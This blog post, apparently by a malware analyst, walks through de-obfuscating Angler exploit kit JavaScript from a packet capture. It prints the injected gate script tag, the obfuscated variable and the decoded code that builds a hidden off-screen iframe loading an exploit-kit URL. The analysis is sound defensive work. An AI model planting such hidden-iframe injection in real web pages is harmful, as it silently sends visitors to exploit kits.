Friday, June 3, 2016

De-Obfuscating Angler Again

I saw today's blog by @malware_traffic on 2016-06-02 - EK DATA DUMP (ANGLER EK, KAIXIN EK, RIG EK). In Brad's notes he listed 2 urls that I thought I'd look into a bit more today

212.231.130.9 port 80 - positivessl.online - GET /script/jquery.min.js - possible gate to Angler EK (I think)
162.252.83.62 port 80 - strachubedabbling.thompsons-online.co.uk - Angler EK

He posted the PCAP for this traffic, and so I opened it in Wireshark, did Export HTTP Object from the positivessl.online traffic and downloaded some raw obfuscated javascript. When looking at that javascript I realized that the variable Mjk2MjkxMDI1MQ was missing, so I looked back in the PCAP at the previous HTTP request and found this block of code

<script>var Mjk2MjkxMDI1MQ="\x4d\x54M\x31O\x54E\x34O\x44A\x35\x4dw";</script>
<script src="http://positivessl.online/script/jquery.min.js"></script>

So I created the variable

var Mjk2MjkxMDI1MQ="\x4d\x54M\x31O\x54E\x34O\x44A\x35\x4dw";


I added the HTML, BODY, and SCRIPT tags. I replaced the malicious function calls at the bottom with simply console.log statements.

console.log(MTEzMzMzNTAxOQ);
console.log(Mjk2MjkxMDI1MQ);
console.log(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));

And when I executed this code the de-obfuscated 1st layer of javascript was revealted.

Then I performed very similar steps removing all function calls (things typically with open close parenthesis) and replaced them with console.log statements to dump what the attacker was going to do without actually executing it. The results were the following simple iframe creating code.

window[document][createElement](iframe)
window[document][createElement](iframe)[width] = 13;
window[document][createElement](iframe)[height] = 13;
window[document][createElement](iframe)[style][cssText] = 'position:absolute;left:-1658px;top:-1668px';
window[document][createElement](iframe)[src] = 'http://strachubedabbling.thompsons-online.co.uk/YxuZYR/rTkNnLU/fOhXXjpeY/00757/sdmmTqbwdx-092620-zkbgrwhi.jpg';

So now we know what the bad guy was doing, without actually running it. He was creating a new iframe, setting the height and width to something tiny, setting the position off the screen so nobody sees it, and then setting the iframe url source to his malicious angler exploit.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. php injection ali.txt walk-thru


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)